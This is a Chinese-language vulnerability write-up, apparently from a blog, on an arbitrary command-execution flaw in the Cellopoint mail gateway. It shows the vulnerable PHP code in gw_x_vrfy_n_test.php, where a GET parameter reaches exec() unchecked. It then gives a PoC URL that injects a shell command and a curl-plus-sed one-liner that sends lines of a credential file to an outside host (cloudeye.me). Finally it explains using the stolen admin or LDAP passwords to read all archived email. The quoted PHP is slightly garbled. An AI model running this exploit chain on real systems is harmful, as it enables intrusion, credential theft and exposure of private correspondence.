cellopoint郵件網(wǎng)關(guān)任意命令執(zhí)行漏洞方示例分析

這篇文章將為大家詳細講解有關(guān)cellopoint郵件網(wǎng)關(guān)任意命令執(zhí)行漏洞方示例分析，文章內(nèi)容質(zhì)量較高，因此小編分享給大家做個參考，希望大家閱讀完這篇文章后對相關(guān)知識有一定的了解。

zend 解密

測試發(fā)現(xiàn)reporter目錄下的gw_x_vrfy_n_test.php文件存在一處命令執(zhí)行：

$email = $_GET["email"];$vrfy = $_GET["vrfy"]; 

$file = (isset($_GET["file"]) ? $_GET["file"] : $ini_default);

$debugFile = "/tmp/vrfy-test.err";$cmd = $GLOBALS["TopFileRoot"] . "smtpd/celloauth -v " . . " -n $vrfy -d 2> debugFile";

exec($cmd, $output, $ret);

$lines = @file($debugFile); 

URL內(nèi)構(gòu)造POC:gw_x_vrfy_n_test.php?vrfy=;$cmd;

的方式可以利用該漏洞執(zhí)行命令（nobody權(quán)限）。

排查發(fā)現(xiàn)/usr/local/mozart/smtpd/default.ini文件保存各項郵件管理員、ldap等賬戶密碼信息。

構(gòu)造以下sed命令（通過sed命令讀取目標文件單行內(nèi)容）：

curl%20-k%20https://cloudeye.me/?info=$(sed%20-n%20§3§p%20/usr/local/mozart/smtpd/default.ini)，

通過查閱遠端服務(wù)器（例如cloudeye.me）的web日志信息，

回顯獲取到default.ini文件內(nèi)容，得到郵件歸檔管理員admin的口令或者配置的ldap密碼，訪問 $ip/report/login.php 登陸查閱全部郵件內(nèi)容。

關(guān)于cellopoint郵件網(wǎng)關(guān)任意命令執(zhí)行漏洞方示例分析就分享到這里了，希望以上內(nèi)容可以對大家有一定的幫助，可以學到更多知識。如果覺得文章不錯，可以把它分享出去讓更多的人看到。